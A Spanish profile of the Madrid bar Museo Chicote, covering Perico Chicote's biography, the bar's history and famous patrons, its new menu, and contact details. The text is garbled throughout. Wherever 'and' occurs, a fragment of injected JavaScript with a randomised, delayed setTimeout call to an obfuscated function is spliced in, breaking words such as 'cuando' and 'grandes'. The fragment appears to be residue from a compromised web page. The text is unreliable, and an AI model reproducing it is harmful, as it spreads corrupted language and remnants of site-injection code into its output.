Museo Chicote

23062015092837550708Sin duda, si hay algo que no saben las nuevas baldosas de la Gran Vía es que por allí andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anduvo una Leyenda, un hombre que hizo de la hostelería un mito y de España un destino para el Turismo. Sí, señores. Chicote fue el pionero en fomentar el Turismo en nuestro país como forma de vida y eso lo convierte en mucho más que un local en el corazón de la Gran Vía de Madrid.

HISTORIA
Su historia es escalofriante al mismo tiempo que admirable. Perico Chicote nació en 1.899 y murió en 1977. Nos quedan sus memorias, que sutilmente recogió Pedro Galindo Vegas en su obra Perico Chicote y la hostelería de su tiempo.
Chicote, que es como todo el mundo le llamaba, perdió a su padre cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sólo tenía 5 años. Su madre, mayor y enferma en cama, no podía llevar a sus hijos al colegio, por lo que aquel crío de a penas un metro de estatura tuvo que empezar a abrir los ojos a la vida y a derrochar un desparpajo impropio de su edad. Con 6 años empezó a trabajar repartiendo periódicos. Se levantaba a las cinco de la mañana para poder repartir la prensa y volver a tiempo para recoger a su hermano en casa; tenían que llegar a tiempo al colegio. Con 12 años consiguió empleo como repartidor de correspondencia. Todas las mañanas se subía en su bicicleta y allá que se marchaba a repartir cartas por los buzones, con el problema añadido de no perder de vista la bicicleta, que más de una vez se la robaron aprovechandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la parbedad de sus años y la nobleza de un corazón que jamás quiso dejarse arrastrar por la debilidad. Era un hombre con cuerpo de niño o un niño obligado a ser un hombre para mantener a su familia.

Chicote siempre le sonreía a la vida, a pesar de los pisotones que ella le metía a menudo. Cuenta la historia que en tiempos de guerra, Chicote tuvo que marcharse con los demás soldados españoles y que, en un momento de debilidad en las trincheras, Chicote cogió y empezó a improvisar cócteles para sus compañeros. Aquel día, Chicote dio más de un sorbo de vida a los soldados que se creían muertos ante tanta tragedia. Y fue tal la motivación que logró en sus compañeros que, desde ese día, sus superiores le ordenaron que no saliera de detrás de la barra, que todos los días se dedicara a “levantarle el ánimo” a los soldados con su simpatía y su saber hacer tras la barra.

Así, Chicote fue un hombre que nació para servir, era feliz sirviendo a los demás, regalandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando parte de su atesorada pobreza. Admirable. El que da todo lo que tiene cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sabe que no tiene nada que perder, solo puede esperar que el que lo reciba sea consciente de que no se quedó con más de lo que le dio a él con tal de ganar. Y fue precisamente su espíritu lo que enamoraba a todo aquel que se acercaba a su lado. Chicote se llegó a convertir en esa fuente de energía, de paz, de felicidad a la que todos se acercaban a beber huyendo de las penas cotidianas. De este modo, se empezó a correr pronto la voz de su existencia. Trabajó durante muchos años en el Hotel Ritz pero finalmente, después de mucho trabajo, sacrificio y ahorrar lo suficiente, logró abrir su propio negocio, el local que luego pasaría a la historia por llevar precisamente su nombre.

Conocido por sus más de 500 cócteles y por ser el barman más querido por los famosos y personalidades más relevantes de la época. Por su local, pasaron actores de cine de Hollywood, grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes toreros de la época, políticos, reyes y principes de diferentes paises… Su museo de bebidas era internacional y no había un punto en el mundo donde no se hablara de él.

ACTUALIDAD
23062015093708894554Con ese cuidado y cariño necesario para mantener en Museo Chicote la idiosincrasia que su fundador quiso que tuviera, la nueva propiedad ha recuperado las tertulias de las ocho de la tarde, hora a la que se reúnen los miembros de la Peña Teatral Chicote, fundada por Jacinto Benavente y Margarita Xirgú. A esas horas, también se dan cita muchos intelectuales al atardecer. Y es que por allí pasaron además de los mencionados: Tono, Edgar Neville, Joaquín Calvo Sotelo, Álvaro de la Iglesia y Miguel Mihura del que se conoce la famosa frase: Yo he nacido en Madrid porque era lo que estaba más cerca de Chicote.
Pero los tiempos cambian y aunque sigue conservandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando su exquisita decoración Art Decó, el sabor inconfundible de sus combinados y ese toque glamuroso de antaño, el Grupo Mercado de la Reina ha decidido darle un nuevo impulso añadiendo el concepto Club Fancy Dinning. De esta manera la gastronomía llega al local, completandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la propuesta con una carta para picar o cenar.
Carpaccio de gambón rojo trufado con nuez de macadamia, hamburguesa de rabo de toro con salsa especial, ensaladilla de gamba blanca, foie micuit con vinagreta de caramelo y melocotón en papillot y su selección de pan tostado, tartar de lubina salvaje con salsa de caviar y tostaditas payesas, entre otros, serán algunas de las exquisiteces que se pueden degustar en el nuevo Museo Chicote.

MUSEO CHICOTE
Gran vía, 12. 28013 Madrid.
Situación: Centro.
Idiomas: Español/Inglés.
Internet: WIFI
Servicios cercanos: Compras, Hoteles, Metro, Museos, Taxi. Trabaja con agencias de organización de eventos: Si
Aforo: 150/180pers.

CONTACTO
91 541 35 00 / 636 268 920

info@museo-chicote.com www.museo-chicote.com